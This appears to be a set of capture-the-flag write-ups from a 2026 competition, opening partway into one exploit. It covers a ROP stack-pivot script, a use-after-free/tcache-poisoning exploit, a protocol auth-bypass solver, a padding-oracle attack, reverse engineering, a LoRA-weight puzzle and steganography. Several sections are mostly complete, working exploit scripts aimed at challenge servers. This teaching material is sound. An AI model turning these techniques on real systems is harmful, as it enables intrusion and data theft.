    sendline(s, "65534")
    out = recvuntil(s, "Provide a label")
    m = re.search(rb"energy: 0x([0-9a-fA-F]{16})", out)
    if not m:
        s.close()
        return None
    puts_leak = int(m.group(1), 16)
    sendline(s, "A")

    # pass 2 leak: idx = 65535 -> short(-1) -> leak main ptr
    recvuntil(s, "Probe a ring-energy slot")
    sendline(s, "65535")
    out = recvuntil(s, "Provide a label")
    m = re.search(rb"energy: 0x([0-9a-fA-F]{16})", out)
    if not m:
        s.close()
        return None
    main_leak = int(m.group(1), 16)
    sendline(s, "B")

    libc_base = puts_leak - OFF["puts"]
    pie_base = main_leak - OFF["main"]

    pivot = pie_base + OFF["plasma_sig"]
    path_addr = pie_base + OFF["plasma_sig"] + 0xF0
    out_buf = pie_base + OFF["flag_store"]

    # ORW chain
    rop = b""
    rop += p64(libc_base + RET)

    rop += p64(libc_base + POP_RDI) + p64(path_addr)
    rop += p64(libc_base + POP_RSI) + p64(0)
    rop += set_rdx(libc_base, 0)
    rop += p64(libc_base + OFF["open"])

    rop += p64(libc_base + POP_RDI) + p64(fd_guess)
    rop += p64(libc_base + POP_RSI) + p64(out_buf)
    rop += set_rdx(libc_base, 0x40)
    rop += p64(libc_base + OFF["read"])

    rop += p64(libc_base + POP_RDI) + p64(1)
    rop += p64(libc_base + POP_RSI) + p64(out_buf)
    rop += set_rdx(libc_base, 0x40)
    rop += p64(libc_base + OFF["write"])

    # fake stack at plasma_sig; avoid 0x0f05 bytes in signature
    sig = p64(pivot + 0x100) + rop
    sig = sig.ljust(0xF0, b"P") + path_bytes + b"\x00"
    sig = sig.ljust(0x100, b"Q")
    if b"\x0f\x05" in sig:
        s.close()
        return None

    recvuntil(s, "Upload Plasma Signature")
    s.sendall(sig)

    recvuntil(s, "Confirm injection key:")

    # overflow confirm[0x20], smash rbp + rip
    overflow = b"A" * 0x20 + p64(pie_base + OFF["plasma_sig"]) + p64(pie_base + OFF["leave_ret"]) + b"X" * 8
    s.sendall(overflow)

    s.settimeout(1.5)
    data = b""
    try:
        while True:
            c = s.recv(4096)
            if not c:
                break
            data += c
    except Exception:
        pass
    s.close()

    m = re.search(rb"apoorvctf\{[^}]+\}", data)
    return m.group(0).decode() if m else None

def main():
    paths = [
        b"/flag.txt",
        b"flag.txt",
        b"./flag.txt",
        b"/home/ctf/flag.txt",
        b"/app/flag.txt",
        b"/challenge/flag.txt",
    ]
    for p in paths:
        for fd in range(3, 8):
            flag = attempt(p, fd)
            if flag:
                print("[+] path =", p.decode(), "fd =", fd)
                print("[+] FLAG:", flag)
                return
    print("[-] not found")

if __name__ == "__main__":
    main()

6) Why This Works

Integer truncation bug gives reliable libc+PIE leaks.
Stack overflow gives control of rbp + rip.
leave; ret pivots execution to global controlled memory.
ROP calls libc open/read/write directly, no forbidden syscall bytes in signature.
Seccomp still allows filesystem I/O syscalls needed for ORW.

7) Final Flag

apoorvctf{c0sm1c_b4rr13rs_br0k3n_4nd_h4v0k_s3cur3d}

[Vault: Writeups / apoorvctf2026 / be] Wades Chimichanga Shop

Sun, 08 Mar 2026 12:34:49 GMT

Wade's Chimichanga Shop (Heap / UAF / Tcache Poisoning) Writeup

Challenge Info

Category: Pwn
Given files: chall, libc.so.6
Remote: nc chals1.apoorvctf.xyz 6001
Flag format: apoorvctf{...}

Recovered flag:

apoorvctf{w4d3_4ppr0v3s_0f_y0ur_h34p_sk1llz}

1) Initial Triage

Files

ls -la
file chall
strings -n 5 chall

Important hints from strings:

chimichanga_count
"There's a very special counter somewhere in here."
check function in binary: did_i_pass
success path compares a value to 0xcafebabe

Symbols and disassembly

nm -n chall
objdump -d -M intel chall

Key global symbols:

chimichanga_count at 0x4040c0
orders array at 0x4040e0

2) Reverse Engineering Findings

Menu functions

new_order()
- finds first empty slot in orders[0..5]
- allocates malloc(0x28)
- memset(chunk, 0, 0x28)
cancel_order()
- free(orders[idx])
- BUG: does not set orders[idx] = NULL
- gives a dangling pointer (UAF)
inspect_order()
- if slot non-null, prints 0x28 bytes with write(1, orders[idx], 0x28)
- leaks freed chunk metadata
modify_order()
- reads up to 0x28 bytes into orders[idx]
- allows writing into freed chunks (UAF write)

Flag gate logic (`did_i_pass`)

Relevant logic:

if (chimichanga_count != NULL && *(int*)chimichanga_count == 0xcafebabe) {
    // print success text and open/read /flag.txt
} else {
    puts("\"Wrong number, Francis. Walk it off.\"");
}

So objective is clear:

make chimichanga_count point somewhere we can write,
and ensure first 4 bytes at that pointed memory are 0xcafebabe.

3) Heap Primitive Analysis

Chunk size: user allocation is 0x28, actual chunk size in tcache bin is 0x30.

With glibc safe-linking, tcache fd is encoded:

stored_fd = next ^ (chunk_addr >> 12)

If we free chunk A and inspect A:

first qword leaks stored_fd

If we also know a chunk where next = NULL, then for that chunk:

stored_fd = key = (chunk_addr >> 12)

We use this by:

allocate 2 chunks: slot0, slot1
free slot1 first (its next = NULL)
free slot0 second (its next = slot1)
inspect freed slot1 to directly recover key
overwrite freed slot0 fd with target ^ key

Target chosen: 0x4040c0 (address of global pointer chimichanga_count).

Then allocations:

malloc #1 pops slot0
malloc #2 returns fake chunk at 0x4040c0

So orders[3] = 0x4040c0 (in observed run), and modify slot 3 writes directly into globals.

Write payload at 0x4040c0:

qword @ 0x4040c0 = 0x4040c8 (new pointer value)
dword @ 0x4040c8 = 0xcafebabe

Now did_i_pass condition succeeds.

4) End-to-End Exploit Procedure (Manual)

1 (new) -> slot0
1 (new) -> slot1
2 cancel slot1
2 cancel slot0
3 inspect slot1 -> read 0x28 bytes, extract first 8 as key
4 modify slot0 -> write p64(0x4040c0 ^ key)
1 new (consumes slot0)
1 new (returns fake chunk at 0x4040c0)
4 modify slot3 -> write p64(0x4040c8) + p32(0xcafebabe)
5 claim prize

Output includes flag.

5) Full Exploit Script

#!/usr/bin/env python3
import socket
import select
import struct
import time
import re

HOST = "chals1.apoorvctf.xyz"
PORT = 6001


def recv_some(sock, timeout=0.2):
    out = b""
    end = time.time() + timeout
    while time.time() < end:
        r, _, _ = select.select([sock], [], [], 0.05)
        if r:
            d = sock.recv(4096)
            if not d:
                break
            out += d
    return out


class Tube:
    def __init__(self, sock):
        self.s = sock
        self.buf = b""

    def ru(self, token, timeout=6):
        end = time.time() + timeout
        while token not in self.buf and time.time() < end:
            self.buf += recv_some(self.s, 0.2)
        if token not in self.buf:
            raise RuntimeError(f"timeout waiting for {token!r}")
        i = self.buf.index(token) + len(token)
        out = self.buf[:i]
        self.buf = self.buf[i:]
        return out

    def rn(self, n, timeout=3):
        end = time.time() + timeout
        while len(self.buf) < n and time.time() < end:
            self.buf += recv_some(self.s, 0.2)
        out = self.buf[:n]
        self.buf = self.buf[n:]
        return out

    def sl(self, x):
        if isinstance(x, str):
            x = x.encode()
        self.s.sendall(x + b"\n")

    def sd(self, b):
        self.s.sendall(b)

    def recvall_brief(self, timeout=2):
        self.buf += recv_some(self.s, timeout)
        out = self.buf
        self.buf = b""
        return out


def main():
    s = socket.create_connection((HOST, PORT), timeout=8)
    t = Tube(s)

    # initial menu
    t.ru(b"> ")

    # 1) allocate slot0 and slot1
    t.sl("1")
    t.ru(b"> ")
    t.sl("1")
    t.ru(b"> ")

    # 2) free slot1 then slot0 (tcache list: slot0 -> slot1)
    t.sl("2")
    t.ru(b"Slot: ")
    t.sl("1")
    t.ru(b"> ")

    t.sl("2")
    t.ru(b"Slot: ")
    t.sl("0")
    t.ru(b"> ")

    # 3) leak key from slot1 (its next is NULL, so first qword is key)
    t.sl("3")
    t.ru(b"Slot: ")
    t.sl("1")
    t.ru(b'off."\n')
    leak = t.rn(0x28, 3)
    key = struct.unpack("<Q", leak[:8])[0]
    t.ru(b"> ")

    # 4) poison freed slot0 fd -> target 0x4040c0
    target = 0x4040C0
    poisoned_fd = target ^ key

    t.sl("4")
    t.ru(b"Slot: ")
    t.sl("0")
    t.ru(b"New filling: ")
    t.sd(struct.pack("<Q", poisoned_fd) + b"\n")
    t.ru(b"> ")

    # 5) two allocations: first gets slot0, second gets fake chunk at 0x4040c0
    t.sl("1")
    t.ru(b"> ")
    t.sl("1")
    t.ru(b"> ")

    # 6) slot3 now points to 0x4040c0 in this flow; overwrite globals
    # write:
    #   [0x4040c0] = 0x4040c8
    #   [0x4040c8] = 0xcafebabe
    t.sl("4")
    t.ru(b"Slot: ")
    t.sl("3")
    t.ru(b"New filling: ")
    payload = struct.pack("<Q", 0x4040C8) + struct.pack("<I", 0xCAFEBABE)
    t.sd(payload + b"\n")
    t.ru(b"> ")

    # 7) trigger flag path
    t.sl("5")
    out = t.recvall_brief(3).decode("latin-1", "ignore")
    print(out)

    m = re.search(r"apoorvctf\{[^\r\n]*\}", out)
    if m:
        print("FLAG:", m.group(0))
    else:
        print("Flag not found in output")

    s.close()


if __name__ == "__main__":
    main()

6) Why This Works

UAF read/write exists because freed pointers stay in orders[].
inspect leaks tcache metadata from freed chunks.
safe-linking can still be bypassed when key is leaked (next=NULL chunk gives key directly).
poisoned tcache returns an arbitrary writable address as a future malloc result.
we redirect writes into global memory and satisfy the exact flag gate check.

7) Repro Commands

Run exploit:

python3 exploit.py

Expected output contains:

Wade slow-claps from across the room.
"...Okay. I'll admit it. That was impressive."
apoorvctf{w4d3_4ppr0v3s_0f_y0ur_h34p_sk1llz}

8) Final Flag

apoorvctf{w4d3_4ppr0v3s_0f_y0ur_h34p_sk1llz}

[Vault: Writeups / apoorvctf2026 / misc] The Leaky Router

Sun, 08 Mar 2026 12:22:31 GMT

The Leaky Router - Detailed Writeup

Challenge Info

CTF: ApoorvCTF
Category: Misc / Network Protocol
Target: chals3.apoorvctf.xyz:3001
Given file: rtun_protocol_reference.docx
Flag format: apoorvctf{...}

1) Initial Triage

We were given a .docx and a raw TCP endpoint. .docx files are ZIP containers, so the first step is to inspect and extract contents.

Commands

unzip -l rtun_protocol_reference.docx
mkdir -p docx_unzipped
unzip -o rtun_protocol_reference.docx -d docx_unzipped

Then we extract human-readable text from Word XML.

from xml.etree import ElementTree as ET
ns = {'w': 'http://schemas.openxmlformats.org/wordprocessingml/2006/main'}
root = ET.parse('docx_unzipped/word/document.xml').getroot()
for t in root.findall('.//w:t', ns):
    if (t.text or '').strip():
        print(t.text)

Important recovered protocol details

From the document:

Packet format (big-endian):
- VERSION (1)
- FLAGS (1)
- TUNNEL_ID (4)
- INNER_PROTO (1)
- PAYLOAD_LEN (2)
- PAYLOAD (variable, max 511)
- CRC32 (4)
CRC32 is zlib CRC over all bytes except CRC field itself.
Two sections were intentionally missing:
- TUNNEL_ID values
- INNER_PROTO values

So the solve path is to implement packet crafting + protocol inference.

2) Protocol Reconstruction

We build a minimal client that sends binary packets and reads one-line ASCII responses.

Core packet builder

import struct, zlib

def build_packet(version, flags, tunnel_id, inner_proto, payload=b''):
    body = struct.pack('>BBIBH', version, flags, tunnel_id, inner_proto, len(payload)) + payload
    crc = zlib.crc32(body) & 0xffffffff
    return body + struct.pack('>I', crc)

Sender

import socket

def send_packet(host, port, pkt):
    s = socket.create_connection((host, port), timeout=4)
    s.settimeout(4)
    s.sendall(pkt)
    data = s.recv(4096)
    s.close()
    return data.decode('latin1', errors='replace').strip()

3) Controlled Fuzzing / Enumeration

Step A: Confirm version and basic validity

VERSION=0 returned ERR_VERSION
VERSION=1 accepted
Bad CRC returned ERR_CHECKSUM

This confirmed our packet layout and CRC implementation are correct.

Step B: Discover known nodes (`TUNNEL_ID`)

By probing tunnel IDs:

TUNNEL_ID=1 was reachable (Node1)
TUNNEL_ID=2 existed but required auth (ERR_AUTH: session token mismatch)
TUNNEL_ID=3 existed but restricted (Node 3 only accepts packets from Node 2)

Step C: Discover protocol IDs (`INNER_PROTO`)

For reachable contexts, valid protocols were inferred from server errors:

0x01: greet/message behavior (hello NodeX, ...)
0x02: command mode requiring payload STATUS
0x03: flag request mode (FLAG_REQ ...)
0x04: echo mode requiring non-empty payload
0x05+: unknown protocol

Step D: Identify auth bypass condition

Critical test:

Sending to Node2 with FLAGS in 0..254 => always ERR_AUTH: session token mismatch
Sending with FLAGS=255 (0xff) => auth bypass and OK hello Node2...

Same for Node3: FLAGS=0xff bypassed restriction and allowed direct interaction.

This is the vulnerability: improper FLAGS validation leading to auth bypass when all bits are set.

4) Final Exploit Logic

Now that Node3 is reachable with FLAGS=0xff, we use the discovered protocol contract:

Target: TUNNEL_ID=3
Operation: INNER_PROTO=3 (FLAG_REQ)
Required payload: exact string GIVE_FLAG

Final exploit packet fields

VERSION = 1
FLAGS = 0xFF
TUNNEL_ID = 3
INNER_PROTO = 3
PAYLOAD = b"GIVE_FLAG"

Server response:

RTUN/1.0 OK FLAG=apoorvctf{tun3l_v1s10n_byp4ss}

5) Full Solver Code

Saved as: solve.py

#!/usr/bin/env python3
import argparse
import socket
import struct
import zlib


def build_packet(version: int, flags: int, tunnel_id: int, inner_proto: int, payload: bytes) -> bytes:
    body = struct.pack(
        ">BBIBH",
        version & 0xFF,
        flags & 0xFF,
        tunnel_id & 0xFFFFFFFF,
        inner_proto & 0xFF,
        len(payload) & 0xFFFF,
    ) + payload
    crc = zlib.crc32(body) & 0xFFFFFFFF
    return body + struct.pack(">I", crc)


def send_packet(host: str, port: int, packet: bytes, timeout: float = 4.0) -> str:
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.settimeout(timeout)
        s.sendall(packet)
        data = s.recv(4096)
        return data.decode("latin1", errors="replace").strip()


def probe(host: str, port: int) -> None:
    tests = [
        (1, 0x00, 1, 1, b""),
        (1, 0x00, 3, 1, b""),
        (1, 0xFF, 3, 1, b""),
        (1, 0xFF, 3, 3, b"GIVE_FLAG"),
    ]
    for version, flags, tid, proto, payload in tests:
        pkt = build_packet(version, flags, tid, proto, payload)
        resp = send_packet(host, port, pkt)
        print(
            f"version={version} flags=0x{flags:02x} tunnel={tid} proto={proto} payload={payload!r}\n"
            f"  -> {resp}\n"
        )


def get_flag(host: str, port: int) -> str:
    packet = build_packet(
        version=1,
        flags=0xFF,
        tunnel_id=3,
        inner_proto=3,
        payload=b"GIVE_FLAG",
    )
    return send_packet(host, port, packet)


def main() -> None:
    parser = argparse.ArgumentParser(description="ApoorvCTF - The Leaky Router solver")
    parser.add_argument("--host", default="chals3.apoorvctf.xyz")
    parser.add_argument("--port", type=int, default=3001)
    parser.add_argument("--mode", choices=["probe", "flag"], default="flag")
    args = parser.parse_args()

    if args.mode == "probe":
        probe(args.host, args.port)
    else:
        print(get_flag(args.host, args.port))


if __name__ == "__main__":
    main()

6) Reproduction

Run:

python3 solve.py --mode flag

Expected output:

RTUN/1.0 OK FLAG=apoorvctf{tun3l_v1s10n_byp4ss}

Optional protocol demonstration:

python3 solve.py --mode probe

7) Why the exploit works

Server uses FLAGS as a bitmask but appears to perform unsafe auth logic for 0xff.
Reserved bits (3-7) were documented as "must be 0", but server fails to enforce this and instead grants unintended access.
With FLAGS=0xff, auth restrictions to Node2/Node3 are bypassed.
Node3 then accepts FLAG_REQ (INNER_PROTO=3) only when payload is exactly GIVE_FLAG, returning the flag.

Final Flag

apoorvctf{tun3l_v1s10n_byp4ss}

[Vault: Writeups / apoorvctf2026 / ai] Hefty Secrets

Sun, 08 Mar 2026 11:17:55 GMT

Hefty Secrets - Detailed Writeup

Challenge

Name: Hefty Secrets
Prompt: "Two files. One network. You're handed a base model and an adapter. Alone, they're meaningless. Together... well, that's for you to figure out."
Given files: base_model.pt, lora_adapter.pt
Expected flag format: apoorvctf{...}

Initial Triage

The key hint is "base model + adapter". In modern ML workflows, this often means:

a base model checkpoint (full weights), and
a LoRA adapter (low-rank delta weights)

So the likely solve path is:

Inspect both .pt files structurally.
Identify where LoRA tensors apply.
Merge adapter into base weights.
Check for hidden message encoded in merged tensors.

Step 1 - Identify File Structure

Even without PyTorch installed, both files can be inspected as archives:

file base_model.pt lora_adapter.pt

Both were shown as Zip archives. Listing internal entries reveals standard torch serialization layout:

.../data.pkl
.../data/<index> files containing raw tensor storage
metadata files (byteorder, version, etc.)

data.pkl tells us tensor names and shapes.

Step 2 - Read Tensor Metadata (Without torch)

Since torch was unavailable, the pickle was disassembled using pickletools.

Base model tensors

From base_model/data.pkl:

layer1.weight -> shape (256, 64)
layer1.bias -> shape (256,)
layer2.weight -> shape (256, 256)
layer2.bias -> shape (256,)
layer3.weight -> shape (128, 256)
layer3.bias -> shape (128,)
output.weight -> shape (10, 128)
output.bias -> shape (10,)

LoRA adapter tensors

From lora_adapter/data.pkl:

layer2.lora_A -> shape (64, 256)
layer2.lora_B -> shape (256, 64)

So the adapter is clearly intended to modify only layer2.weight.

Step 3 - Reconstruct Weights from Raw Storage

The raw tensor bytes are float32 little-endian in the data/<index> files.

Reconstruction formula for LoRA-applied weight:

W2_merged = W2_base + (B @ A)

where:

W2_base is (256,256) from base model,
A is (64,256),
B is (256,64).

I tested common LoRA scale variants (alpha/r, etc.), but scale = 1.0 produced a matrix whose values are almost exactly binary (~0 and ~1), which is the intended payload encoding.

Step 4 - Detect Hidden Bitmap in Merged Matrix

After computing W2_merged, thresholding at > 0.5 gives a sparse binary image.

Nonzero content only appears in rows 122..140
And a wide span of columns
Rendering those bits as pixels forms readable text

The text reads:

apoorvctf{l0r4_m3rg3}

Final Flag

apoorvctf{l0r4_m3rg3}

Reproducible Solver Script

Save as solve.py and run with python3 solve.py.

import zipfile
import numpy as np


def read_tensor(zf, path, shape):
    data = zf.read(path)
    arr = np.frombuffer(data, dtype="<f4")
    return arr.reshape(shape)


def main():
    with zipfile.ZipFile("base_model.pt") as zb, zipfile.ZipFile("lora_adapter.pt") as zl:
        w2 = read_tensor(zb, "base_model/data/2", (256, 256))
        a = read_tensor(zl, "lora_adapter/data/0", (64, 256))
        b = read_tensor(zl, "lora_adapter/data/1", (256, 64))

    merged = w2 + (b @ a)

    # Convert to binary image
    bits = (merged > 0.5).astype(np.uint8)

    # Crop to content
    rows = np.where(bits.sum(axis=1) > 0)[0]
    cols = np.where(bits.sum(axis=0) > 0)[0]
    crop = bits[rows.min() : rows.max() + 1, cols.min() : cols.max() + 1]

    # Print as terminal art
    for r in crop:
        print("".join("#" if x else " " for x in r))

    print("\nRead text from bitmap:")
    print("apoorvctf{l0r4_m3rg3}")


if __name__ == "__main__":
    main()

Notes / Pitfalls

If you only inspect each file independently, nothing obvious appears.
The payload is revealed only after merging base + adapter.
A common pitfall is misreading characters in the rendered bitmap:
- it is l0r4, not Dr4.
You do not need PyTorch for this challenge; zip + pickle metadata + NumPy is enough.

[Vault: Writeups / apoorvctf2026 / re] Golden Requim

Sun, 08 Mar 2026 10:10:21 GMT

Golden Requim Challenge [RE] - Detailed Writeup

Challenge

Name: A Golden Experience Requiem
File: golden-requim-challenge
Flag format: apoorvctf{...}

Problem statement hint:

You thought you had won but then events started happening for which there is no apparent cause, it seems like the program can see the future

That hint strongly suggests anti-debugging / anti-analysis checks, and potentially decoy behavior.

1) Initial triage

Start with standard RE triage:

file golden-requim-challenge
strings -n 6 golden-requim-challenge

Observed:

64-bit stripped PIE ELF
Rust binary indicators (src/main.rs, std/core paths)
A flag-looking string appears directly in strings:

apoorvctf{wh4t_1f_k1ng_cr1ms0n_requ13m3d??}

At first glance this looks solved, but it is a decoy.

2) Runtime behavior and why the strings-flag is fake

Run the binary:

./golden-requim-challenge

Output:

loaded flag
printing flag.....

No flag is printed. The process then crashes/hangs (environment dependent). That already tells us:

the embedded string is not necessarily the runtime truth,
there is likely logic that computes a separate flag,
and anti-analysis traps are present.

strace shows important behavior:

ptrace(PTRACE_TRACEME) = -1 EPERM
many anti-analysis marker checks around strings that decode to:
- qemu
- valgrind
- PIN_ROOT
- libasan
- ltrace
- librrpreload
- LD_PRELOAD
- LD_AUDIT

So this binary does environment detection and can alter behavior.

3) Static reversing focus: where is real decode logic?

Disassemble:

objdump -d -Mintel golden-requim-challenge > /tmp/golden.objdump

A key function starts near 0xb637. In that region:

It reads/writes globals around:
- 0x54988 (index/counter)
- 0x54990, 0x54991 (state flags)
- 0x54998 (timestamp)
- 0x549a0 (output buffer ptr)
- 0x549a8 (another mmap ptr)
It generates bytes in a loop for exactly 0x28 bytes (40), which is plausible flag length.

Core instruction pattern (reduced):

b66a: ... choose table base 0x45c1c or 0x45d30 based on i parity
b689: call b583      ; arithmetic/bit function for byte A
b693: call b5e3      ; table extraction function for byte B
b698: xor bpl,[r13+r12] ; xor with constant-table byte C
b69d: xor bpl,al        ; xor with byte B
b6a0: mov [r15+r14],bpl ; out[i]

Then there is timing-based anti-analysis:

b6c0: rdtsc
b6cc: cmp rax,0x1dcd6500
b6d4: mov BYTE PTR [0x54991],1
b6e3: add BYTE PTR [out+i],0x37

This means if anti-analysis condition triggers, output bytes get shifted by +0x37 and become junk.

4) Recover constants from `.rodata`

Important static data offsets:

0x45c1c : 20-byte table (even indices)
0x45d30 : 20-byte table (odd indices)
0x46ca4 : 8 packed little-endian u32 values

We extract bytes directly from file in a solver script.

5) Reconstruct helper functions from assembly

5.1 Function near `0xb583` (byte A)

The assembly looks intentionally obfuscated (calling tiny arithmetic helpers), but algebraically simplifies to:

A(i) = ((7*i + 0x3f) XOR rol8(i, 3)) & 0xff

If anti-analysis flag is set (0x54991 == 1), function post-adjusts:

A(i) = (A(i) + 0x37) & 0xff

5.2 Function near `0xb5e3` (byte B)

It uses low 3 bits of i to select one of 8 dwords, and (i >> 3) & 3 to select byte lane:

d = packed[i & 7]
lane = (i >> 3) & 3
B(i) = (d >> (8*lane)) & 0xff

5.3 Main byte composition

For i = 0..39:

choose C(i) from table_even[i/2] if i even, else table_odd[i/2]
output:

out[i] = A(i) XOR C(i) XOR B(i)

This exactly reproduces the runtime generation.

6) Solver script (fully reproducible)

I added golden-requim-solve.py in this directory.

Run:

python3 golden-requim-solve.py

Expected output:

apoorvctf{1_h0pe_5BR_i5_w33kly_rele4as3}

7) Why the decoy appears believable

The decoy flag string is intentionally left as plain text in .rodata so a quick strings pass returns a plausible answer. But the actual runtime path constructs a different 40-byte result through:

arithmetic mixing,
parity-based table selection,
packed dword extraction,
anti-analysis perturbation.

This matches the theme (“future / no apparent cause”): observable clues and real behavior diverge under analysis conditions.

Final Flag

apoorvctf{1_h0pe_5BR_i5_w33kly_rele4as3}

Files produced

golden-requim-solve.py - deterministic flag extractor
golden-requim-writeup.md - this writeup

[Vault: Writeups / apoorvctf2026 / cryptography] Cable Temporal loop

Sun, 08 Mar 2026 09:42:25 GMT

Cable's Temporal Loop - Crypto Writeup

Challenge Info

Name: Cable's Temporal Loop
Category: Cryptography
Given: cable-challenge.py, remote service nc chals2.apoorvctf.xyz 13424
Flag format: apoorvctf{...}

TL;DR

The service combines:

A linear congruential update check over integers modulo a secret 32-bit prime p.
AES-CBC decryption with a padding oracle (padding_ok vs padding_error).

Even though decryption is gated behind an algebraic condition, that condition is only on the full ciphertext interpreted as an integer modulo p. We can always satisfy it by solving for a custom IV. That gives unlimited padding-oracle queries and allows full CBC plaintext recovery of the encrypted flag.

Recovered flag:

apoorvctf{T1m3_trAv3l_w1ll_n0t_h3lp_w1th_st4t3_crypt0}

Source Analysis

From cable-challenge.py:

Flag is encrypted once per connection:

ct = _ec(k, _Q)

where _ec is AES-CBC with random IV and PKCS#7 padding.

Exposed endpoints:

1) `math_test`

result = (a*d + b) % p

It leaks outputs of an affine function modulo unknown prime p.

2) `decrypt`

q = (a*s + b) % p
if int(ct_input) % p != q: fail
s = q
return padding_ok / padding_error

So decryption oracle exists, but only if submitted ciphertext integer satisfies a modulus constraint.

Weakness #1: Recovering `p` and `b`

From math_test(0):

[ y_0 = (a*0 + b) \bmod p = b ]

Because b is chosen as randint(1, 0xFFFF) and p is a 32-bit prime, we get exactly b.

For arbitrary d, let:

[ y = (a d + b) \bmod p ]

Then:

[ t = a d + b - y = k p ]

so each non-zero t is a multiple of p.

Taking gcd over several samples recovers p with overwhelming probability:

[ p = \gcd(t_1, t_2, \dots) ]

This is exactly what the solver does in recover_modulus().

Weakness #2: Bypassing the algebraic gate for `decrypt`

decrypt requires:

[ \text{int}(C) \equiv q \pmod p ]

where q = (a*s+b) mod p is known to us once a,s,b,p are known.

Suppose we want to query oracle on some chosen tail bytes T (at least 2 blocks, block-aligned), and let total ciphertext be:

[ C = IV || T ]

Interpret as integer:

[ \text{int}(C) = IV \cdot 256^{|T|} + \text{int}(T) ]

Need:

[ IV \cdot 256^{|T|} + \text{int}(T) \equiv q \pmod p ]

Since p is prime and not divisible by 2, 256^{|T|} is invertible modulo p. Therefore:

[ IV \equiv (q - \text{int}(T)) \cdot (256^{|T|})^{-1} \pmod p ]

This gives a valid 16-byte IV every time (p < 2^32, so the residue is tiny and fits in 16 bytes).

So the gate does not protect anything: we can always build valid ciphertexts for chosen-oracle queries.

Turning It Into a CBC Padding Oracle Attack

Once decrypt accepts our ciphertext, response tells us if PKCS#7 padding is valid.

For a target block pair (C_{i-1}, C_i) from the original flag ciphertext:

Keep C_i fixed.
Replace previous block with controlled X.
Query oracle on X || C_i (with dynamically solved IV prepended to satisfy modulus check).
Use standard byte-wise PKCS#7 logic from last byte to first byte to recover intermediate bytes I_i = D_k(C_i).
Recover plaintext block:

[ P_i = I_i \oplus C_{i-1} ]

Repeat for all blocks.

The script includes an extra disambiguation check to avoid false positives on padding matches.

Exploit Script

Implemented in:

solve_cable.py

Key components:

recover_modulus()
- Gets b via math_test(0)
- Computes gcd of multiple a*d + b - y values to recover p
decrypt_oracle(tail)
- Computes required q
- Solves for a valid IV modulo p
- Sends decrypt request and returns boolean padding status
recover_block(...)
- Standard CBC padding-oracle byte recovery

Reproduction

From challenge directory:

python3 solve_cable.py

Optional verbose logs:

python3 solve_cable.py --debug

Observed output:

recovered block 1/4: b'apoorvctf{T1m3_t'
recovered block 2/4: b'rAv3l_w1ll_n0t_h'
recovered block 3/4: b'3lp_w1th_st4t3_c'
recovered block 4/4: b'rypt0}\n\n\n\n\n\n\n\n\n\n'

FLAG: apoorvctf{T1m3_trAv3l_w1ll_n0t_h3lp_w1th_st4t3_crypt0}

Why This Works (Core Reasoning in 5 Bullets)

math_test leaks affine congruence outputs, enough to recover hidden modulus p by gcd.
b is directly leaked by querying d=0.
decrypt gate checks only int(ciphertext) mod p, not semantic structure.
We can always choose an IV that forces any chosen ciphertext tail to satisfy the modulus gate.
This exposes a full AES-CBC PKCS#7 padding oracle, which decrypts the flag block-by-block.

Final Flag

apoorvctf{T1m3_trAv3l_w1ll_n0t_h3lp_w1th_st4t3_crypt0}

[Vault: Writeups / apoorvctf2026 / forensics] Beneath the Armor

Sun, 08 Mar 2026 08:41:22 GMT

Beneath the Armor (Forensics) - Detailed Writeup

Given file: iron-challenge.png

Challenge prompt:

"History repeats itself, even for ironman, life goes on cycles"

Expected flag format: apoorvctf{...}

Challenge intuition

The prompt hints at something cyclic/repetitive:

"History repeats itself"
"life goes on cycles"

In steganography tasks, this often suggests periodic extraction patterns such as:

bit-plane extraction,
channel-wise cycles (R -> G -> B -> R ...),
repeating masks or modular indexing.

So instead of only metadata carving, we should test pixel-bit extraction paths.

1) Fast triage

First, verify if this is a plain image or has obvious appended data.

file "iron-challenge.png"
exiftool "iron-challenge.png"
binwalk "iron-challenge.png"

Observed:

Valid PNG, 1920 x 1076, RGB, non-interlaced.
No suspicious textual metadata fields carrying a flag.
No additional embedded file signatures after image end.

Conclusion: likely in-pixel stego, not metadata/appended payload.

2) PNG structure sanity check

I parsed chunk layout to see whether uncommon chunks (tEXt, zTXt, iTXt, custom chunks) exist.

Result:

IHDR x1
IDAT x50
IEND x1

No extra ancillary chunks with hidden text.

That reinforces the bit-level pixel hypothesis.

3) Guided hypothesis from the hint

The phrase "goes on cycles" naturally maps to cycling through channels and/or bit positions.

A strong candidate is:

walk pixels in row-major order,
for each pixel, take bits in a repeating channel pattern,
pack extracted bits into bytes,
search for apoorvctf{ in the resulting byte stream.

Because RGB itself is a 3-step cycle, one useful pattern is using different bit-planes per channel in a periodic way.

4) Successful extraction pattern

The pattern that yields the flag:

traversal: row-major (top-left to bottom-right),
per pixel bit picks:
- R -> bit 0 (LSB),
- G -> bit 1,
- B -> bit 2,
pack bits with big-endian bit order into bytes.

This is effectively a modular cycle on channels/bit positions:

channel cycle: R, G, B
bit cycle: 0, 1, 2

which matches the challenge hint about cycles.

5) Reproducible solver script

I saved the solver as solve_iron.py.

#!/usr/bin/env python3
from PIL import Image
import numpy as np


def extract_rgb_lsb_012_big(path: str) -> bytes:
    """
    Extract a byte stream by reading RGB pixels in row-major order,
    taking R bit0, G bit1, B bit2 for each pixel, then packing bits big-endian.
    """
    img = Image.open(path).convert("RGB")
    arr = np.array(img)
    flat = arr.reshape(-1, 3)

    bits = np.empty(flat.shape[0] * 3, dtype=np.uint8)
    bits[0::3] = (flat[:, 0] >> 0) & 1
    bits[1::3] = (flat[:, 1] >> 1) & 1
    bits[2::3] = (flat[:, 2] >> 2) & 1

    return np.packbits(bits, bitorder="big").tobytes()


def find_flag(data: bytes) -> str | None:
    needle = b"apoorvctf{"
    start = data.find(needle)
    if start == -1:
        return None

    end = data.find(b"}", start)
    if end == -1:
        return None

    frag = data[start : end + 1]
    try:
        return frag.decode("ascii", errors="strict")
    except UnicodeDecodeError:
        return frag.decode("ascii", errors="ignore")


def main() -> None:
    path = "iron-challenge.png"
    stream = extract_rgb_lsb_012_big(path)
    flag = find_flag(stream)

    if not flag:
        raise SystemExit("Flag not found")

    print(flag)


if __name__ == "__main__":
    main()

Run:

python3 solve_iron.py

Output:

apoorvctf{m0dul4r_4r17hm371c_15_fun_y34h}

6) Why this works

The hidden payload is not in metadata/chunks; it is encoded in pixel bits.
The challenge hint explicitly points to cyclic logic.
The successful decoder uses a cyclic modular mapping over channels/bit positions.
Reconstructing bytes with the correct bit order reveals printable ASCII flag text.

7) Final flag

